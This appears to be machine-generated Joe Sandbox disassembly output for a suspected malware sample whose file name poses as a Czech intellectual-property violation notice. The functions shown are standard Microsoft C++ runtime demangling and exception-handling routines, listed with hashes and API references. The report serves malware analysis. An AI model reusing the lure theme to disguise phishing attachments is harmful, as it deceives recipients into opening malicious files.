                                                          • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                          • API String ID: 1551792257-2441609178
                                                          • Opcode ID: 5739013eefef8b0a56b790c76ed8ac9dc98eea95788d2691a1c21bd7ec2964b5
                                                          • Instruction ID: 3039ec48cfc2e4e536108f3761c86ade66ebf1ab1259a0d6347259fe3f75a11b
                                                          • Opcode Fuzzy Hash: 5739013eefef8b0a56b790c76ed8ac9dc98eea95788d2691a1c21bd7ec2964b5
                                                          • Instruction Fuzzy Hash: 7A91D776C0630AD9DB85CFF8D988FEE7B78AF06304F52451AD115A62C0DB39BA078761

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1299 6fdf98a5-6fdf98bb 1300 6fdf98bd-6fdf98c6 1299->1300 1301 6fdf98cc-6fdf98ce 1300->1301 1302 6fdf9bf5-6fdf9bfe 1300->1302 1301->1302 1305 6fdf98d4-6fdf98db 1301->1305 1303 6fdf9c11-6fdf9c16 1302->1303 1304 6fdf9c00-6fdf9c02 1302->1304 1308 6fdf9c18-6fdf9c1f call 6fdf5473 1303->1308 1309 6fdf9c21-6fdf9c59 call 6fdf524a call 6fdf5550 call 6fdf5572 1303->1309 1306 6fdf9c5c-6fdf9c62 1304->1306 1307 6fdf9c04-6fdf9c0f 1304->1307 1310 6fdf98dd-6fdf98e4 1305->1310 1311 6fdf98ea-6fdf98ed 1305->1311 1307->1306 1308->1306 1309->1306 1310->1306 1310->1311 1314 6fdf98ef-6fdf9922 call 6fdf51dc call 6fdf5572 1311->1314 1315 6fdf9941-6fdf9949 1311->1315 1314->1315 1339 6fdf9924-6fdf993e call 6fdf5503 1314->1339 1317 6fdf994f-6fdf995e 1315->1317 1318 6fdf9bc3-6fdf9bd0 call 6fdfb175 1315->1318 1321 6fdf9ba6-6fdf9bc1 call 6fdfb175 1317->1321 1322 6fdf9964-6fdf9967 1317->1322 1336 6fdf9bd3 1318->1336 1321->1336 1328 6fdf9b4d-6fdf9b99 call 6fdf5153 call 6fdf51dc call 6fdf5572 1322->1328 1329 6fdf996d-6fdf9970 1322->1329 1365 6fdf9beb-6fdf9bef 1328->1365 1375 6fdf9b9b-6fdf9ba4 call 6fdf571c 1328->1375 1334 6fdf9aba-6fdf9ac0 1329->1334 1335 6fdf9976-6fdf997a 1329->1335 1342 6fdf9b14-6fdf9b48 call 6fdf795a call 6fdf5503 call 6fdf5594 1334->1342 1343 6fdf9ac2-6fdf9ac6 1334->1343 1335->1328 1340 6fdf9980-6fdf9983 1335->1340 1341 6fdf9bd6-6fdf9bda call 6fdf5572 1336->1341 1339->1315 1348 6fdf9a79-6fdf9ab5 call 6fdfb175 call 6fdf5594 call 6fdf5572 1340->1348 1349 6fdf9989-6fdf998c 1340->1349 1358 6fdf9bdf-6fdf9be8 1341->1358 1342->1341 1343->1342 1351 6fdf9ac8-6fdf9b03 call 6fdf890f call 6fdf5572 1343->1351 1348->1358 1356 6fdf998e-6fdf999b call 6fdf8742 1349->1356 1357 6fdf99a0-6fdf99ad 1349->1357 1351->1365 1379 6fdf9b09-6fdf9b0f 1351->1379 1356->1341 1361 6fdf99b2-6fdf99c7 call 6fdfb175 1357->1361 1358->1365 1381 6fdf99c9-6fdf99cb 1361->1381 1382 6fdf9a15-6fdf9a1d 1361->1382 1365->1300 1365->1302 1375->1365 1379->1365 1386 6fdf9a0d-6fdf9a13 1381->1386 1387 6fdf99cd-6fdf9a0b call 6fdf55d8 call 6fdf5572 1381->1387 1389 6fdf9a1e-6fdf9a23 1382->1389 1386->1389 1387->1389 1391 6fdf9a69-6fdf9a74 1389->1391 1392 6fdf9a25-6fdf9a2d 1389->1392 1391->1365 1392->1361 1394 6fdf9a2f-6fdf9a31 1392->1394 1394->1391 1396 6fdf9a33-6fdf9a64 call 6fdf5503 call 6fdf5594 1394->1396 1396->1379
                                                          APIs
                                                          • DName::operator+.LIBCMT ref: 6FDF9910
                                                          • DName::operator+.LIBCMT ref: 6FDF9A53
                                                            • Part of subcall function 6FDF55D8: shared_ptr.LIBCMT ref: 6FDF55F4
                                                          • DName::operator+.LIBCMT ref: 6FDF99FE
                                                          • DName::operator+.LIBCMT ref: 6FDF9A9F
                                                          • DName::operator+.LIBCMT ref: 6FDF9AAE
                                                          • DName::operator+.LIBCMT ref: 6FDF9BDA
                                                          • DName::operator=.LIBVCRUNTIME ref: 6FDF9C1A
                                                          • DName::DName.LIBVCRUNTIME ref: 6FDF9C24
                                                          • DName::operator+.LIBCMT ref: 6FDF9C41
                                                          • DName::operator+.LIBCMT ref: 6FDF9C4D
                                                            • Part of subcall function 6FDFB175: Replicator::operator[].LIBCMT ref: 6FDFB1B2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]shared_ptr
                                                          • String ID: `anonymous namespace'
                                                          • API String ID: 1043660730-3062148218
                                                          • Opcode ID: 031347083e7f8b68ea2133fe22e985fff4c14ff1dff3bfb2e2021420c87c1dc2
                                                          • Instruction ID: 0d5299d5e05f5018a16abdb14d2ba0f2c9fce54a98caf8ffd5fbb440a8619389
                                                          • Opcode Fuzzy Hash: 031347083e7f8b68ea2133fe22e985fff4c14ff1dff3bfb2e2021420c87c1dc2
                                                          • Instruction Fuzzy Hash: 4AC18E75D05309DFDB51CFA8C880FEABBF8AB0A304F01445EE145AB284EB35B64ACB11

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1402 6fdfb175-6fdfb1a1 1403 6fdfb1be-6fdfb1c2 1402->1403 1404 6fdfb1a3-6fdfb1b9 call 6fdf54a5 1402->1404 1406 6fdfb20f-6fdfb221 call 6fdfb5c5 1403->1406 1407 6fdfb1c4-6fdfb1e6 call 6fdfa24f 1403->1407 1413 6fdfb381-6fdfb38e call 6fdff260 1404->1413 1417 6fdfb236-6fdfb248 call 6fdfb5c5 1406->1417 1418 6fdfb223-6fdfb234 1406->1418 1414 6fdfb1e8-6fdfb1ee 1407->1414 1415 6fdfb1f3-6fdfb20a call 6fdf5473 1407->1415 1419 6fdfb346-6fdfb34a 1414->1419 1415->1419 1430 6fdfb24e-6fdfb258 1417->1430 1431 6fdfb319-6fdfb31d 1417->1431 1422 6fdfb25f-6fdfb279 call 6fdf9d58 1418->1422 1426 6fdfb34c-6fdfb355 1419->1426 1427 6fdfb378-6fdfb380 1419->1427 1434 6fdfb27b-6fdfb282 1422->1434 1435 6fdfb2f9-6fdfb317 call 6fdf51dc call 6fdf5572 1422->1435 1426->1427 1432 6fdfb357-6fdfb359 1426->1432 1427->1413 1430->1422 1436 6fdfb31f-6fdfb323 1431->1436 1437 6fdfb332-6fdfb33c call 6fdf5153 1431->1437 1432->1427 1433 6fdfb35b-6fdfb369 call 6fdf87e3 1432->1433 1433->1427 1447 6fdfb36b-6fdfb374 1433->1447 1434->1435 1439 6fdfb284-6fdfb2ba call 6fdf9dd6 atol __telemetry_main_return_trigger 1434->1439 1452 6fdfb2ec-6fdfb2f7 call 6fdf5594 1435->1452 1436->1437 1441 6fdfb325-6fdfb330 1436->1441 1446 6fdfb341-6fdfb344 1437->1446 1454 6fdfb2ce-6fdfb2e9 call 6fdf51dc call 6fdf5572 1439->1454 1455 6fdfb2bc-6fdfb2cc call 6fdf4f06 1439->1455 1441->1419 1446->1419 1447->1427 1452->1446 1454->1452 1455->1446
                                                          APIs
                                                          • Replicator::operator[].LIBCMT ref: 6FDFB1B2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Replicator::operator[]
                                                          • String ID: @$`generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                          • API String ID: 3676697650-3433397351
                                                          • Opcode ID: f3583ea28a53c1f81483ed01e52150a432b7541807fc38024795e8fc255e8735
                                                          • Instruction ID: 73b6449c005e1dfe0fa6dbc52c8e0459e414c9d20514f266537597c4b28f7ea4
                                                          • Opcode Fuzzy Hash: f3583ea28a53c1f81483ed01e52150a432b7541807fc38024795e8fc255e8735
                                                          • Instruction Fuzzy Hash: 36617F71D4570ADBDB40DFA8D840FEEBBB8AF4A354F12411AE511A72D0DB34B616CBA0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1463 6fdf82ef-6fdf8302 1464 6fdf8308-6fdf830a 1463->1464 1465 6fdf8681-6fdf868e call 6fdf552e 1463->1465 1466 6fdf830c-6fdf830e 1464->1466 1467 6fdf8310-6fdf8312 1464->1467 1473 6fdf8691 1465->1473 1466->1467 1469 6fdf8318-6fdf8328 1466->1469 1467->1469 1471 6fdf867d-6fdf867f 1467->1471 1474 6fdf832a-6fdf832e 1469->1474 1475 6fdf8350-6fdf8352 1469->1475 1472 6fdf8673-6fdf867b call 6fdf524a 1471->1472 1472->1473 1477 6fdf8694-6fdf8698 1473->1477 1474->1465 1478 6fdf8334-6fdf8344 1474->1478 1475->1471 1479 6fdf8358-6fdf835b 1475->1479 1481 6fdf834b-6fdf834e 1478->1481 1482 6fdf8346-6fdf8349 1478->1482 1479->1471 1483 6fdf8361-6fdf8364 1479->1483 1481->1483 1482->1481 1482->1483 1483->1471 1484 6fdf836a-6fdf8385 1483->1484 1485 6fdf838b-6fdf838e 1484->1485 1486 6fdf8472-6fdf8475 1484->1486 1487 6fdf8394-6fdf83d1 call 6fdf51dc call 6fdf5572 1485->1487 1488 6fdf8431-6fdf8432 1485->1488 1489 6fdf8477-6fdf8486 1486->1489 1490 6fdf84f5-6fdf8504 1486->1490 1521 6fdf8404-6fdf8423 call 6fdf524a call 6fdf5572 1487->1521 1522 6fdf83d3-6fdf8402 call 6fdf98a5 call 6fdf5503 call 6fdf5572 1487->1522 1494 6fdf8438-6fdf843c 1488->1494 1495 6fdf8488-6fdf84b6 call 6fdf6ac1 call 6fdf5503 call 6fdf5572 1489->1495 1496 6fdf84e6-6fdf84f0 call 6fdf6ac1 call 6fdf575c 1489->1496 1492 6fdf8528-6fdf8532 call 6fdf70cc call 6fdf575c 1490->1492 1493 6fdf8506-6fdf8526 call 6fdf70cc call 6fdf5572 1490->1493 1526 6fdf8537-6fdf853b 1492->1526 1493->1526 1499 6fdf84c9-6fdf84e1 call 6fdf524a call 6fdf5572 1494->1499 1500 6fdf8442-6fdf8444 1494->1500 1495->1490 1496->1490 1499->1473 1500->1471 1507 6fdf844a-6fdf845f 1500->1507 1515 6fdf84b8-6fdf84c7 call 6fdfa8a8 call 6fdf575c 1507->1515 1516 6fdf8461-6fdf846f call 6fdfa8a8 1507->1516 1515->1486 1516->1486 1552 6fdf8426-6fdf842f 1521->1552 1522->1552 1532 6fdf853d-6fdf8564 call 6fdf5503 call 6fdf5594 1526->1532 1533 6fdf8567-6fdf8577 call 6fdf87e3 1526->1533 1532->1533 1548 6fdf8579-6fdf857e 1533->1548 1549 6fdf8580 1533->1549 1553 6fdf8582-6fdf85c7 call 6fdf9876 call 6fdf670a call 6fdf5503 call 6fdf5594 call 6fdf5630 1548->1553 1549->1553 1552->1494 1566 6fdf85df-6fdf85eb 1553->1566 1567 6fdf85c9-6fdf85cb 1553->1567 1569 6fdf85fe-6fdf8608 call 6fdf975d call 6fdf575c 1566->1569 1570 6fdf85ed-6fdf85fc call 6fdf975d call 6fdf5630 1566->1570 1567->1566 1568 6fdf85cd-6fdf85d9 call 6fdf5630 1567->1568 1568->1566 1579 6fdf860d-6fdf8630 call 6fdf886d call 6fdf5630 1569->1579 1570->1579 1585 6fdf8643-6fdf864d call 6fdfa8d7 call 6fdf575c 1579->1585 1586 6fdf8632-6fdf8641 call 6fdfa8d7 call 6fdf5630 1579->1586 1594 6fdf8652-6fdf8654 1585->1594 1586->1594 1595 6fdf8656-6fdf866f 1594->1595 1596 6fdf8671 1594->1596 1595->1477 1596->1472
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Name::operator+$NameName::$Decorator::getReturnTypeoperator+
                                                          • String ID:
                                                          • API String ID: 2932655852-0
                                                          • Opcode ID: a8d6205ef12f81ddbd9623117241387df34fa4694bcda47ea23a9fb7e8b49981
                                                          • Instruction ID: a9016b9ee9a683a47bccdf7142eefdde6a35851498fcce6ec82e995d26302a27
                                                          • Opcode Fuzzy Hash: a8d6205ef12f81ddbd9623117241387df34fa4694bcda47ea23a9fb7e8b49981
                                                          • Instruction Fuzzy Hash: 56C19175D06309AFCB45CFA8D890EEE7BB8AB05314F02415EE552A72D0DB34BA46CB61

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1597 6fdf7d06-6fdf7d16 1598 6fdf7d18-6fdf7d42 call 6fdf51dc call 6fdf55b6 1597->1598 1599 6fdf7d43-6fdf7d50 1597->1599 1601 6fdf7d52-6fdf7d61 1599->1601 1602 6fdf7da1-6fdf7db0 1599->1602 1604 6fdf7d63-6fdf7d6d 1601->1604 1606 6fdf7dba-6fdf7dca call 6fdfb38f 1601->1606 1602->1604 1605 6fdf7db2-6fdf7db8 1602->1605 1609 6fdf7d6f-6fdf7d78 call 6fdf7eb0 1604->1609 1610 6fdf7d79-6fdf7d9a call 6fdf9c63 call 6fdf5630 1604->1610 1605->1604 1605->1606 1617 6fdf7e9e-6fdf7eab call 6fdf524a 1606->1617 1618 6fdf7dd0-6fdf7dd3 1606->1618 1609->1610 1631 6fdf7d9d-6fdf7da0 1610->1631 1617->1631 1621 6fdf7dd9-6fdf7ddc 1618->1621 1622 6fdf7e73 1618->1622 1625 6fdf7e63-6fdf7e71 1621->1625 1626 6fdf7de2-6fdf7de5 1621->1626 1627 6fdf7e7a 1622->1627 1630 6fdf7e81-6fdf7e88 call 6fdf5452 1625->1630 1628 6fdf7e5a-6fdf7e61 1626->1628 1629 6fdf7de7-6fdf7dea 1626->1629 1627->1630 1628->1627 1632 6fdf7dec-6fdf7def 1629->1632 1633 6fdf7e1a-6fdf7e58 call 6fdf7eb0 call 6fdf51dc call 6fdf5572 1629->1633 1637 6fdf7e8d-6fdf7e99 1630->1637 1635 6fdf7e0a-6fdf7e18 1632->1635 1636 6fdf7df1-6fdf7df4 1632->1636 1633->1637 1635->1630 1636->1637 1639 6fdf7dfa-6fdf7e08 1636->1639 1637->1610 1639->1630
                                                          APIs
                                                          • DName::operator+.LIBCMT ref: 6FDF7D39
                                                            • Part of subcall function 6FDF55B6: DName::operator+=.LIBCMT ref: 6FDF55CC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Name::operator+Name::operator+=
                                                          • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                          • API String ID: 382699925-1464470183
                                                          • Opcode ID: 1656a2c1f41b9ddd7aa2e0ca3e864ebddaf11b4893005b37d645e2fbc00e1b23
                                                          • Instruction ID: 6c8db7027b30929e55e779e20c6ce485b73ec342e0f2089a002f88adc15276dc
                                                          • Opcode Fuzzy Hash: 1656a2c1f41b9ddd7aa2e0ca3e864ebddaf11b4893005b37d645e2fbc00e1b23
                                                          • Instruction Fuzzy Hash: 6A414E76D0230AEACB44CFA8D981EEEBFB9AF45314F11411AD515AB340D735BA46CBA0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1645 6fdf3108-6fdf3133 call 6fdfd920 1648 6fdf343c abort 1645->1648 1649 6fdf3139-6fdf313c 1645->1649 1650 6fdf3442-6fdf3446 1648->1650 1649->1648 1651 6fdf3142-6fdf314b 1649->1651 1652 6fdf3244-6fdf324a 1651->1652 1653 6fdf3151-6fdf3155 1651->1653 1655 6fdf3252-6fdf3260 1652->1655 1653->1652 1654 6fdf315b-6fdf3162 1653->1654 1656 6fdf317a-6fdf317f 1654->1656 1657 6fdf3164-6fdf316b 1654->1657 1658 6fdf340f-6fdf3412 1655->1658 1659 6fdf3266-6fdf326a 1655->1659 1656->1652 1661 6fdf3185-6fdf318d call 6fdf4ae8 1656->1661 1657->1656 1660 6fdf316d-6fdf3174 1657->1660 1662 6fdf3414-6fdf3417 1658->1662 1663 6fdf3431-6fdf343a call 6fdf4ae8 1658->1663 1659->1658 1664 6fdf3270-6fdf3277 1659->1664 1660->1652 1660->1656 1661->1650 1678 6fdf3193-6fdf31ac call 6fdf4ae8 * 2 1661->1678 1662->1648 1666 6fdf3419-6fdf342e call 6fdf34a4 1662->1666 1663->1648 1663->1650 1667 6fdf328f-6fdf3295 1664->1667 1668 6fdf3279-6fdf3280 1664->1668 1666->1663 1673 6fdf33ac-6fdf33b0 1667->1673 1674 6fdf329b-6fdf32c2 call 6fdfd94b 1667->1674 1668->1667 1672 6fdf3282-6fdf3289 1668->1672 1672->1658 1672->1667 1676 6fdf33bc-6fdf33c8 1673->1676 1677 6fdf33b2-6fdf33bb call 6fdf2ba0 1673->1677 1674->1673 1685 6fdf32c8-6fdf32cb 1674->1685 1676->1663 1682 6fdf33ca-6fdf33d4 1676->1682 1677->1676 1678->1648 1705 6fdf31b2-6fdf31b8 1678->1705 1687 6fdf33d6-6fdf33d8 1682->1687 1688 6fdf33e2-6fdf33e4 1682->1688 1690 6fdf32ce-6fdf32e3 1685->1690 1687->1663 1691 6fdf33da-6fdf33de 1687->1691 1692 6fdf33fe-6fdf340b call 6fdf3b9e 1688->1692 1693 6fdf33e6-6fdf33f6 call 6fdf4ae8 * 2 1688->1693 1695 6fdf338d-6fdf33a0 1690->1695 1696 6fdf32e9-6fdf32ec 1690->1696 1691->1663 1698 6fdf33e0 1691->1698 1710 6fdf340d 1692->1710 1711 6fdf3467-6fdf347c call 6fdf4ae8 * 2 1692->1711 1693->1692 1695->1690 1701 6fdf33a6-6fdf33a9 1695->1701 1696->1695 1702 6fdf32f2-6fdf32fa 1696->1702 1698->1693 1701->1673 1702->1695 1709 6fdf3300-6fdf3314 1702->1709 1707 6fdf31ba-6fdf31be 1705->1707 1708 6fdf31e4-6fdf31ec call 6fdf4ae8 1705->1708 1707->1708 1713 6fdf31c0-6fdf31c7 1707->1713 1725 6fdf31ee-6fdf320e call 6fdf4ae8 * 2 call 6fdf3b9e 1708->1725 1726 6fdf324c-6fdf324f 1708->1726 1714 6fdf3317-6fdf3328 1709->1714 1710->1663 1736 6fdf347e 1711->1736 1737 6fdf3481-6fdf34a3 call 6fdfdb28 call 6fdf3aa6 call 6fdf3c5c call 6fdf3a1c 1711->1737 1717 6fdf31db-6fdf31de 1713->1717 1718 6fdf31c9-6fdf31d0 1713->1718 1719 6fdf334e-6fdf335b 1714->1719 1720 6fdf332a-6fdf333b call 6fdf35db 1714->1720 1717->1648 1717->1708 1718->1717 1723 6fdf31d2-6fdf31d9 1718->1723 1719->1714 1728 6fdf335d 1719->1728 1733 6fdf335f-6fdf3387 call 6fdf3088 1720->1733 1734 6fdf333d-6fdf3346 1720->1734 1723->1708 1723->1717 1725->1726 1750 6fdf3210-6fdf3215 1725->1750 1726->1655 1732 6fdf338a 1728->1732 1732->1695 1733->1732 1734->1720 1738 6fdf3348-6fdf334b 1734->1738 1736->1737 1738->1719 1751 6fdf323e terminate 1750->1751 1752 6fdf3217-6fdf322a call 6fdf3801 1750->1752 1751->1652 1758 6fdf3447-6fdf3462 call 6fdf2ba0 call 6fdf379b call 6fdf48a0 1752->1758 1759 6fdf3230-6fdf323c 1752->1759 1758->1711 1759->1751 1759->1752
                                                          APIs
                                                          • type_info::operator==.LIBVCRUNTIME ref: 6FDF3223
                                                          • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0(6FE010A4), ref: 6FDF323E
                                                          • ___TypeMatch.LIBVCRUNTIME ref: 6FDF3331
                                                          • __DestructExceptionObject.VCRUNTIME140(?,00000001), ref: 6FDF33B5
                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6FDF343C
                                                          • __DestructExceptionObject.VCRUNTIME140(?,00000001,6FE010A4), ref: 6FDF344A
                                                          • _CxxThrowException.VCRUNTIME140(?,6FDFFBC4,6FE010A4), ref: 6FDF3462
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Exception$DestructObject$MatchThrowTypeabortterminatetype_info::operator==
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 2807342543-393685449
                                                          • Opcode ID: dc845bf8b2455021a58262d922a4f74fd6854244c5387b54e370d5ddf31a42e6
                                                          • Instruction ID: 947841f03fd1a27e16a6d612701cd5616b9b18f952301f0c659e181d424963dd
                                                          • Opcode Fuzzy Hash: dc845bf8b2455021a58262d922a4f74fd6854244c5387b54e370d5ddf31a42e6
                                                          • Instruction Fuzzy Hash: 3AB16A75802309EFCF85DFA4C981D9EBBB5BF05318B53415AE815AB241C731FA52CBA2

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1765 6fdf9291-6fdf92ab 1766 6fdf9344-6fdf934c call 6fdf552e 1765->1766 1767 6fdf92b1-6fdf92b4 1765->1767 1775 6fdf9351 1766->1775 1768 6fdf92b6-6fdf92bc 1767->1768 1769 6fdf9335-6fdf933a 1767->1769 1773 6fdf92be-6fdf92c1 1768->1773 1774 6fdf9307-6fdf9333 call 6fdf964c 1768->1774 1771 6fdf933c-6fdf933e 1769->1771 1772 6fdf935a-6fdf9369 1769->1772 1771->1766 1777 6fdf9443-6fdf944d call 6fdf524a 1771->1777 1781 6fdf936f-6fdf9372 1772->1781 1782 6fdf942a-6fdf942d 1772->1782 1778 6fdf92d3-6fdf92dc 1773->1778 1779 6fdf92c3-6fdf92ce call 6fdf6b70 1773->1779 1780 6fdf9354 1774->1780 1775->1780 1777->1780 1789 6fdf92ee-6fdf92f5 1778->1789 1790 6fdf92de-6fdf92ec 1778->1790 1779->1780 1787 6fdf9357-6fdf9359 1780->1787 1791 6fdf93ef-6fdf93f8 1781->1791 1792 6fdf9374-6fdf9376 1781->1792 1784 6fdf9433-6fdf9436 1782->1784 1785 6fdf94d2-6fdf94da 1782->1785 1793 6fdf9438-6fdf943c 1784->1793 1794 6fdf9484-6fdf9491 1784->1794 1785->1777 1797 6fdf92fc-6fdf9301 call 6fdf5452 1789->1797 1790->1797 1799 6fdf940a-6fdf9411 1791->1799 1800 6fdf93fa-6fdf9408 1791->1800 1792->1766 1798 6fdf9378-6fdf937b 1792->1798 1804 6fdf943e-6fdf9441 1793->1804 1805 6fdf9467-6fdf947f 1793->1805 1802 6fdf94b3-6fdf94cd call 6fdf51dc 1794->1802 1803 6fdf9493-6fdf94ae call 6fdf54e1 1794->1803 1797->1774 1807 6fdf937d-6fdf9380 1798->1807 1808 6fdf93d9-6fdf93ea call 6fdf82ef 1798->1808 1801 6fdf9418-6fdf941d call 6fdf5452 1799->1801 1800->1801 1825 6fdf9423 1801->1825 1802->1780 1803->1775 1804->1777 1812 6fdf9452-6fdf9462 call 6fdf9c63 1804->1812 1805->1787 1815 6fdf9382-6fdf9385 1807->1815 1816 6fdf93c1-6fdf93d4 call 6fdf94df 1807->1816 1808->1791 1812->1805 1823 6fdf9387-6fdf938a 1815->1823 1824 6fdf9395-6fdf93bf call 6fdf7196 call 6fdf6b70 1815->1824 1816->1775 1823->1825 1826 6fdf9390 1823->1826 1824->1780 1825->1782 1826->1777
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: operator+shared_ptr$NameName::
                                                          • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                          • API String ID: 2894330373-757766384
                                                          • Opcode ID: a939b506543a89c315c9216c75969d121ea9a2ade08742217aa53100fd7a7d78
                                                          • Instruction ID: 5c5201d34f8d77aa7a80e67bdb4616cb04e8e48f7ba82b8f060e39faec6e9db2
                                                          • Opcode Fuzzy Hash: a939b506543a89c315c9216c75969d121ea9a2ade08742217aa53100fd7a7d78
                                                          • Instruction Fuzzy Hash: 72618175C0620AEBCF44DFA8C844EED7BB4FB46318F02825AE4549A254D736B207CB55

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1833 6fdf44f0-6fdf4501 call 6fdff1a0 1836 6fdf4515-6fdf453d 1833->1836 1837 6fdf4503 1833->1837 1839 6fdf453f-6fdf454b call 6fdf4154 1836->1839 1840 6fdf454d-6fdf455a 1836->1840 1838 6fdf4505-6fdf4514 1837->1838 1847 6fdf456b-6fdf456d 1839->1847 1841 6fdf455c-6fdf4561 call 6fdf406b 1840->1841 1842 6fdf4563 call 6fdf423d 1840->1842 1849 6fdf4568 1841->1849 1842->1849 1850 6fdf456f-6fdf4572 1847->1850 1851 6fdf457d-6fdf4592 call 6fdf43a5 1847->1851 1849->1847 1852 6fdf45c4-6fdf45e2 call 6fdf442b call 6fdf48a0 1850->1852 1853 6fdf4574-6fdf457b 1850->1853 1851->1838 1853->1837
                                                          APIs
                                                          Strings
                                                          • Bad read pointer - no RTTI data!, xrefs: 6FDF462A
                                                          • Attempted a typeid of nullptr pointer!, xrefs: 6FDF465E
                                                          • Bad dynamic_cast!, xrefs: 6FDF45C4
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Offset
                                                          • String ID: Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                          • API String ID: 1587990502-2941716148
